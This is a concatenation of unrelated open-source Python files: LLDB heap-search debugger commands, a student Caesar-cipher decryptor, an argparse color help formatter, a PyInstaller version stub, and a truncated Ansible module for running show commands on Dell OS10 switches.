# 4 bytes 0xa1a1a1a1
# 12 bytes 'AUTORELEASE!'
# ptr bytes autorelease insertion point
# ptr bytes pthread_t
# ptr bytes next colder page
# ptr bytes next hotter page
# 4 bytes this page's depth in the list
# 4 bytes high-water mark
description += ' AUTORELEASE! for pthread_t %#x' % (
thread)
# else:
# description += 'malloc(%u)' % (malloc_size)
# else:
# description += 'malloc(%u)' % (malloc_size)
else:
derefed_dynamic_value = dynamic_value.deref
if derefed_dynamic_value:
derefed_dynamic_type = derefed_dynamic_value.type
derefed_dynamic_type_size = derefed_dynamic_type.size
derefed_dynamic_type_name = derefed_dynamic_type.name
description += ' '
description += derefed_dynamic_type_name
if offset < derefed_dynamic_type_size:
member_list = list()
get_member_types_for_offset(
derefed_dynamic_type, offset, member_list)
if member_list:
member_path = ''
for member in member_list:
member_name = member.name
if member_name:
if member_path:
member_path += '.'
member_path += member_name
if member_path:
if options.ivar_regex_blacklist:
for ivar_regex in options.ivar_regex_blacklist:
if ivar_regex.match(
member_path):
print_entry = False
description += '.%s' % (member_path)
else:
description += '%u bytes after %s' % (
offset - derefed_dynamic_type_size, derefed_dynamic_type_name)
else:
# strip the "*" from the end of the name since we
# were unable to dereference this
description += dynamic_value.type.name[0:-1]
if print_entry:
match_idx += 1
result_output = ''
if description:
result_output += description
if options.print_type and derefed_dynamic_value:
result_output += ' %s' % (derefed_dynamic_value)
if options.print_object_description and dynamic_value:
desc = dynamic_value.GetObjectDescription()
if desc:
result_output += '\n%s' % (desc)
if result_output:
result.AppendMessage(result_output)
if options.memory:
cmd_result = lldb.SBCommandReturnObject()
if options.format is None:
memory_command = "memory read --force 0x%x 0x%x" % (
malloc_addr, malloc_addr + malloc_size)
else:
memory_command = "memory read --force -f %s 0x%x 0x%x" % (
options.format, malloc_addr, malloc_addr + malloc_size)
if options.verbose:
result.AppendMessage(memory_command)
lldb.debugger.GetCommandInterpreter().HandleCommand(memory_command, cmd_result)
result.AppendMessage(cmd_result.GetOutput())
if options.stack_history:
dump_stack_history_entries(options, result, malloc_addr, 1)
elif options.stack:
dump_stack_history_entries(options, result, malloc_addr, 0)
return i
else:
result.AppendMessage(str(expr_sbvalue.error))
return 0
def get_ptr_refs_options():
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
description = '''Searches all allocations on the heap for pointer values on
darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the pointers and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='ptr_refs',
usage=usage)
add_common_options(parser)
return parser
def find_variable(debugger, command, result, dict):
usage = "usage: %prog [options] <ADDR> [ADDR ...]"
description = '''Searches for a local variable in all frames that contains a hex ADDR.'''
command_args = shlex.split(command)
parser = optparse.OptionParser(
description=description,
prog='find_variable',
usage=usage)
parser.add_option(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='display verbose debug info',
default=False)
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
for arg in args:
var_addr = int(arg, 16)
print("Finding a variable with address %#x..." % (var_addr), file=result)
done = False
for thread in process:
for frame in thread:
var = find_variable_containing_address(
options.verbose, frame, var_addr)
if var:
print(var)
done = True
break
if done:
break
def ptr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_ptr_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'pointer'
if options.format is None:
options.format = "A" # 'A' is "address" format
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
void *ptr;
} callback_baton_t;
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
typedef void* T;
const unsigned size = sizeof(T);
T *array = (T*)ptr_addr;
for (unsigned idx = 0; ((idx + 1) * sizeof(T)) <= ptr_size; ++idx) {
if (array[idx] == lldb_info->ptr) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = idx*sizeof(T);
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
};
callback_baton_t baton = { range_callback, 0, {0}, (void *)%s };
'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our pointer expressions and display the
# results
for ptr_expr in args:
user_init_code = user_init_code_format % (
options.max_matches, ptr_expr)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'malloc block containing pointer %s' % ptr_expr
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage('error: no pointer arguments were given')
def get_cstr_refs_options():
usage = "usage: %prog [options] <CSTR> [CSTR ...]"
description = '''Searches all allocations on the heap for C string values on
darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the C strings and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='cstr_refs',
usage=usage)
add_common_options(parser)
return parser
def cstr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_cstr_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'cstr'
if options.format is None:
options.format = "Y" # 'Y' is "bytes with ASCII" format
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
const char *cstr;
unsigned cstr_len;
} callback_baton_t;
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (lldb_info->cstr_len < ptr_size) {
const char *begin = (const char *)ptr_addr;
const char *end = begin + ptr_size - lldb_info->cstr_len;
for (const char *s = begin; s < end; ++s) {
if ((int)memcmp(s, lldb_info->cstr, lldb_info->cstr_len) == 0) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = s - begin;
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
}
};
const char *cstr = "%s";
callback_baton_t baton = { range_callback, 0, {0}, cstr, (unsigned)strlen(cstr) };'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our pointer expressions and display the
# results
for cstr in args:
user_init_code = user_init_code_format % (
options.max_matches, cstr)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'malloc block containing "%s"' % cstr
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage(
'error: command takes one or more C string arguments')
def get_malloc_info_options():
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
    description = '''Searches the heap for a malloc block that contains the addresses
specified as one or more address expressions. Any matches that were found will
dump the malloc blocks that match or contain the specified address. The matching
blocks might be able to show what kind of objects they are using dynamic type
information in the program.'''
parser = optparse.OptionParser(
description=description,
prog='malloc_info',
usage=usage)
add_common_options(parser)
return parser
def malloc_info(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_malloc_info_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
malloc_info_impl(debugger, result, options, args)
def malloc_info_impl(debugger, result, options, args):
# We are specifically looking for something on the heap only
options.type = 'malloc_info'
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[2]; // Two items so they can be NULL terminated
void *ptr;
} callback_baton_t;
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (lldb_info->num_matches == 0) {
uint8_t *p = (uint8_t *)lldb_info->ptr;
uint8_t *lo = (uint8_t *)ptr_addr;
uint8_t *hi = lo + ptr_size;
if (lo <= p && p < hi) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = p - lo;
lldb_info->matches[lldb_info->num_matches].type = type;
lldb_info->num_matches = 1;
}
}
};
callback_baton_t baton = { range_callback, 0, {0}, (void *)%s };
baton.matches[0].addr = 0;
baton.matches[1].addr = 0;'''
if args:
total_matches = 0
for ptr_expr in args:
user_init_code = user_init_code_format % (ptr_expr)
expr = get_iterate_memory_expr(
options, process, user_init_code, 'baton.matches')
arg_str_description = 'malloc block that contains %s' % ptr_expr
total_matches += display_match_results(
process, result, options, arg_str_description, expr, True, expr_prefix)
return total_matches
else:
result.AppendMessage(
'error: command takes one or more pointer expressions')
return 0
def get_thread_stack_ranges_struct(process):
'''Create code that defines a structure that represents threads stack bounds
for all threads. It returns a static sized array initialized with all of
the tid, base, size structs for all the threads.'''
stack_dicts = list()
if process:
i = 0
for thread in process:
min_sp = thread.frame[0].sp
max_sp = min_sp
for frame in thread.frames:
sp = frame.sp
if sp < min_sp:
min_sp = sp
if sp > max_sp:
max_sp = sp
if min_sp < max_sp:
stack_dicts.append({'tid': thread.GetThreadID(
), 'base': min_sp, 'size': max_sp - min_sp, 'index': i})
i += 1
stack_dicts_len = len(stack_dicts)
if stack_dicts_len > 0:
result = '''
#define NUM_STACKS %u
#define STACK_RED_ZONE_SIZE %u
typedef struct thread_stack_t { uint64_t tid, base, size; } thread_stack_t;
thread_stack_t stacks[NUM_STACKS];''' % (stack_dicts_len, process.target.GetStackRedZoneSize())
for stack_dict in stack_dicts:
result += '''
stacks[%(index)u].tid = 0x%(tid)x;
stacks[%(index)u].base = 0x%(base)x;
stacks[%(index)u].size = 0x%(size)x;''' % stack_dict
return result
else:
return ''
def get_sections_ranges_struct(process):
'''Create code that defines a structure that represents all segments that
can contain data for all images in "target". It returns a static sized
array initialized with all of base, size structs for all the threads.'''
target = process.target
segment_dicts = list()
for (module_idx, module) in enumerate(target.modules):
for sect_idx in range(module.GetNumSections()):
section = module.GetSectionAtIndex(sect_idx)
if not section:
break
name = section.name
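            # skip segments that are not expected to contain data (__TEXT, __LINKEDIT, __PAGEZERO)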
if name != '__TEXT' and name != '__LINKEDIT' and name != '__PAGEZERO':
base = section.GetLoadAddress(target)
size = section.GetByteSize()
if base != lldb.LLDB_INVALID_ADDRESS and size > 0:
segment_dicts.append({'base': base, 'size': size})
segment_dicts_len = len(segment_dicts)
if segment_dicts_len > 0:
result = '''
#define NUM_SEGMENTS %u
typedef struct segment_range_t { uint64_t base; uint32_t size; } segment_range_t;
segment_range_t segments[NUM_SEGMENTS];''' % (segment_dicts_len,)
for (idx, segment_dict) in enumerate(segment_dicts):
segment_dict['index'] = idx
result += '''
segments[%(index)u].base = 0x%(base)x;
segments[%(index)u].size = 0x%(size)x;''' % segment_dict
return result
else:
return ''
def section_ptr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
description = '''Searches section contents for pointer values in darwin user space programs.'''
parser = optparse.OptionParser(
description=description,
prog='section_ptr_refs',
usage=usage)
add_common_options(parser)
parser.add_option(
'--section',
action='append',
type='string',
dest='section_names',
help='section name to search',
default=list())
try:
(options, args) = parser.parse_args(command_args)
except:
return
options.type = 'pointer'
sections = list()
section_modules = list()
if not options.section_names:
result.AppendMessage(
'error: at least one section must be specified with the --section option')
return
target = debugger.GetSelectedTarget()
for module in target.modules:
for section_name in options.section_names:
section = module.section[section_name]
if section:
sections.append(section)
section_modules.append(module)
if sections:
dylid_load_err = load_dylib()
if dylid_load_err:
result.AppendMessage(dylid_load_err)
return
frame = target.GetProcess().GetSelectedThread().GetSelectedFrame()
for expr_str in args:
for (idx, section) in enumerate(sections):
expr = 'find_pointer_in_memory(0x%xllu, %ullu, (void *)%s)' % (
section.addr.load_addr, section.size, expr_str)
arg_str_description = 'section %s.%s containing "%s"' % (
section_modules[idx].file.fullpath, section.name, expr_str)
num_matches = display_match_results(
target.GetProcess(), result, options, arg_str_description, expr, False)
if num_matches:
if num_matches < options.max_matches:
options.max_matches = options.max_matches - num_matches
else:
options.max_matches = 0
if options.max_matches == 0:
return
else:
result.AppendMessage(
'error: no sections were found that match any of %s' %
(', '.join(
options.section_names)))
def get_objc_refs_options():
usage = "usage: %prog [options] <CLASS> [CLASS ...]"
description = '''Searches all allocations on the heap for instances of
objective C classes, or any classes that inherit from the specified classes
in darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the instances and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='objc_refs',
usage=usage)
add_common_options(parser)
return parser
def objc_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_objc_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'isa'
if options.format is None:
options.format = "A" # 'A' is "address" format
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(
        3 * 1000 * 1000) # 3 second timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
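    # Ask the Objective-C runtime how many classes are registered so the
    # class list array in the expression below can be sized accordingly.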
num_objc_classes_value = frame.EvaluateExpression(
"(int)objc_getClassList((void *)0, (int)0)", expr_options)
if not num_objc_classes_value.error.Success():
result.AppendMessage('error: %s' %
num_objc_classes_value.error.GetCString())
return
num_objc_classes = num_objc_classes_value.GetValueAsUnsigned()
if num_objc_classes == 0:
result.AppendMessage('error: no objective C classes in program')
return
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef int (*compare_callback_t)(const void *a, const void *b);
typedef struct callback_baton_t {
range_callback_t callback;
compare_callback_t compare_callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
void *isa;
Class classes[%u];
} callback_baton_t;
compare_callback_t compare_callback = [](const void *a, const void *b) -> int {
Class a_ptr = *(Class *)a;
Class b_ptr = *(Class *)b;
if (a_ptr < b_ptr) return -1;
if (a_ptr > b_ptr) return +1;
return 0;
};
typedef Class (*class_getSuperclass_type)(void *isa);
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
class_getSuperclass_type class_getSuperclass_impl = (class_getSuperclass_type)class_getSuperclass;
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (sizeof(Class) <= ptr_size) {
Class *curr_class_ptr = (Class *)ptr_addr;
Class *matching_class_ptr = (Class *)bsearch (curr_class_ptr,
(const void *)lldb_info->classes,
sizeof(lldb_info->classes)/sizeof(Class),
sizeof(Class),
lldb_info->compare_callback);
if (matching_class_ptr) {
bool match = false;
if (lldb_info->isa) {
Class isa = *curr_class_ptr;
if (lldb_info->isa == isa)
match = true;
else { // if (lldb_info->objc.match_superclasses) {
Class super = class_getSuperclass_impl(isa);
while (super) {
if (super == lldb_info->isa) {
match = true;
break;
}
super = class_getSuperclass_impl(super);
}
}
}
else
match = true;
if (match) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = 0;
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
}
};
callback_baton_t baton = { range_callback, compare_callback, 0, {0}, (void *)0x%x, {0} };
int nc = (int)objc_getClassList(baton.classes, sizeof(baton.classes)/sizeof(Class));
(void)qsort (baton.classes, sizeof(baton.classes)/sizeof(Class), sizeof(Class), compare_callback);'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our ObjC class name arguments
for class_name in args:
addr_expr_str = "(void *)[%s class]" % class_name
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(
1 * 1000 * 1000) # 1 second timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
expr_sbvalue = frame.EvaluateExpression(
addr_expr_str, expr_options)
if expr_sbvalue.error.Success():
isa = expr_sbvalue.unsigned
if isa:
options.type = 'isa'
result.AppendMessage(
'Searching for all instances of classes or subclasses of "%s" (isa=0x%x)' %
(class_name, isa))
user_init_code = user_init_code_format % (
options.max_matches, num_objc_classes, isa)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'objective C classes with isa 0x%x' % isa
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage(
'error: Can\'t find isa for an ObjC class named "%s"' %
(class_name))
else:
result.AppendMessage(
'error: expression error for "%s": %s' %
(addr_expr_str, expr_sbvalue.error))
else:
result.AppendMessage(
            'error: command takes one or more Objective-C class name arguments')
if __name__ == '__main__':
lldb.debugger = lldb.SBDebugger.Create()
# Make the options so we can generate the help text for the new LLDB
# command line command prior to registering it with LLDB below. This way
# if clients in LLDB type "help malloc_info", they will see the exact same
# output as typing "malloc_info --help".
ptr_refs.__doc__ = get_ptr_refs_options().format_help()
cstr_refs.__doc__ = get_cstr_refs_options().format_help()
malloc_info.__doc__ = get_malloc_info_options().format_help()
objc_refs.__doc__ = get_objc_refs_options().format_help()
lldb.debugger.HandleCommand(
'command script add -f %s.ptr_refs ptr_refs' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.cstr_refs cstr_refs' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.malloc_info malloc_info' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.find_variable find_variable' %
__name__)
# lldb.debugger.HandleCommand('command script add -f %s.heap heap' % package_name)
# lldb.debugger.HandleCommand('command script add -f %s.section_ptr_refs section_ptr_refs' % package_name)
# lldb.debugger.HandleCommand('command script add -f %s.stack_ptr_refs stack_ptr_refs' % package_name)
lldb.debugger.HandleCommand(
'command script add -f %s.objc_refs objc_refs' %
__name__)
print('"malloc_info", "ptr_refs", "cstr_refs", "find_variable", and "objc_refs" commands have been installed, use the "--help" options on these commands for detailed help.')
| endlessm/chromium-browser | third_party/llvm/lldb/examples/darwin/heap_find/heap.py | Python | bsd-3-clause | 61,273 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""Împăratul a primit serie de mesaje importante pe care este
important să le descifreze cât mai repede.
Din păcate mesagerul nu a apucat să îi spună împăratul care au fost
cheile alese pentru fiecare mesaj și tu ai fost ales să descifrezi
misterul.
Informații:
În criptografie, cifrul lui Caesar este o metodă simplă de a cripta
un mesaj prin înlocuirea fiecărei litere cu litera de pe poziția aflată
la un n pași de ea în alfabet (unde este n este un număr întreg cunoscut
"""
# there were two ways to solve the print parentheses problem
# I preferred this one in order to also avoid the potential issues
# you said you were going to stress us about ;)
from __future__ import print_function
LETTERS = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz"
# the letter will always be found in the "LETTERS" string,
# so the wrap-around is sufficiently represented
# by listing a-z twice
def shift_letter(let, number):
"""Shifts a letter by number places in LETTERS"""
if let.isalpha():
        # only letters are processed
return LETTERS[ord(let) - 97 + number]
        # return the letter n places further along in LETTERS
else:
return let
        # if it is not a letter, return the original character
def decripteaza(mesaj, number):
"""Decrypts every line in <mesaj>"""
new_msg = ""
for char in mesaj:
new_msg += shift_letter(char, number)
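    # heuristic: only print candidate plaintexts that contain "ave"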
if "ave" in new_msg:
print(new_msg)
def main():
"""Have a main docstring, pylint"""
try:
fisier = open("mesaje.secret", "r")
mesaje = fisier.read()
fisier.close()
except IOError:
print("Nu am putut obține mesajele.")
return
for mesaj in mesaje.splitlines():
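        # try every possible shift (0-25) for this message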
for i in range(26):
decripteaza(mesaj, i)
if __name__ == "__main__":
main()
| iulianbute/labs | python/solutii/alex_mitan/caesar.py | Python | mit | 1,892 |
# -*- coding: utf-8 -*-
"""
@author: Fabio Erculiani <[email protected]>
@contact: [email protected]
@copyright: Fabio Erculiani
@license: GPL-2
B{Entropy Infrastructure Toolkit}.
"""
import sys
import argparse
import textwrap as _textwrap
from entropy.output import decolorize
class ColorfulFormatter(argparse.RawTextHelpFormatter):
"""
This is just a whacky HelpFormatter flavour to add some coloring.
"""
def __colors(self, tup_str, orig_str):
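        """Re-apply the original (colored) text while keeping the leading and
        trailing whitespace computed from the decolorized layout string."""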
pre_spaces = len(tup_str) - len(tup_str.lstrip())
post_spaces = len(tup_str) - len(tup_str.rstrip())
return " "*pre_spaces + orig_str.strip() \
+ " "*post_spaces
def _format_action(self, action):
# determine the required width and the entry label
help_position = min(self._action_max_length + 2,
self._max_help_position)
help_width = self._width - help_position
action_width = help_position - self._current_indent - 2
orig_action_header = self._format_action_invocation(action)
action_header = decolorize(orig_action_header)
        # no help; start on same line and add a final newline
if not action.help:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
# short action name; start on the same line and pad two spaces
elif len(action_header) <= action_width:
tup = self._current_indent, '', action_width, action_header
tup_str = '%*s%-*s ' % tup
action_header = self.__colors(tup_str, orig_action_header)
indent_first = 0
# long action name; start on the next line
else:
tup = self._current_indent, '', action_header
tup_str = '%*s%-*s ' % tup
action_header = self.__colors(tup_str, orig_action_header)
indent_first = help_position
# collect the pieces of the action help
parts = [action_header]
# if there was help for the action, add lines of help text
if action.help:
orig_help_text = self._expand_help(action)
help_text = decolorize(orig_help_text)
help_lines = self._split_lines(help_text, help_width)
orig_help_lines = self._split_lines(orig_help_text, help_width)
tup_str = '%*s%s' % (indent_first, '', help_lines[0])
parts.append(self.__colors(tup_str, orig_help_lines[0]) + "\n")
for idx, line in enumerate(help_lines[1:]):
tup_str = '%*s%s' % (help_position, '', line)
parts.append(
self.__colors(tup_str, orig_help_lines[idx+1]) + "\n")
# or add a newline if the description doesn't end with one
elif not action_header.endswith('\n'):
parts.append('\n')
# if there are any sub-actions, add their help as well
for subaction in self._iter_indented_subactions(action):
parts.append(self._format_action(subaction))
# return a single string
return self._join_parts(parts)
| mudler/entropy | server/eit/colorful.py | Python | gpl-2.0 | 3,125 |
__version__ = '0.17'
| etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/PyInstaller/lib/modulegraph/__init__.py | Python | gpl-3.0 | 21 |
#!/usr/bin/python
#
# (c) 2015 Peter Sprygada, <[email protected]>
# Copyright (c) 2017 Dell Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: dellos10_command
version_added: "2.2"
author: "Senthil Kumar Ganesan (@skg-net)"
short_description: Run commands on remote devices running Dell OS10
description:
- Sends arbitrary commands to a Dell OS10 node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(dellos10_config) to configure Dell OS10 devices.
extends_documentation_fragment: dellos10
options:
commands:
description:
- List of commands to send to the remote dellos10 device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of I(retries), the task fails.
See examples.
required: false
default: null
retries:
description:
      - Specifies the number of retries a command should be tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
vars:
cli:
host: "{{ inventory_hostname }}"
username: admin
password: admin
transport: cli
tasks:
- name: run show version on remote devices
dellos10_command:
commands: show version
provider: "{{ cli }}"
- name: run show version and check to see if output contains OS10
dellos10_command:
commands: show version
wait_for: result[0] contains OS10
provider: "{{ cli }}"
- name: run multiple commands on remote nodes
dellos10_command:
commands:
- show version
- show interface
provider: "{{ cli }}"
- name: run multiple commands and evaluate the output
dellos10_command:
commands:
- show version
- show interface
wait_for:
- result[0] contains OS10
- result[1] contains Ethernet
provider: "{{ cli }}"
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always apart from low level errors (such as action plugin)
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always apart from low level errors (such as action plugin)
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
warnings:
description: The list of warnings (if any) generated by module based on arguments
returned: always
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.dellos10.dellos10 import run_commands
from ansible.module_utils.network.dellos10.dellos10 import dellos10_argument_spec, check_args
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='dellos10_command does not support running config mode '
'commands. Please use dellos10_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
# { command: <str>, prompt: <str>, response: <str> }
commands=dict(type='list', required=True),
wait_for=dict(type='list'),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(dellos10_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
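    # Re-run the commands until the wait_for conditionals are satisfied
    # (all of them, or any one when match=any) or the retries are exhausted.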
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
        msg = 'One or more conditional statements have not been satisfied'
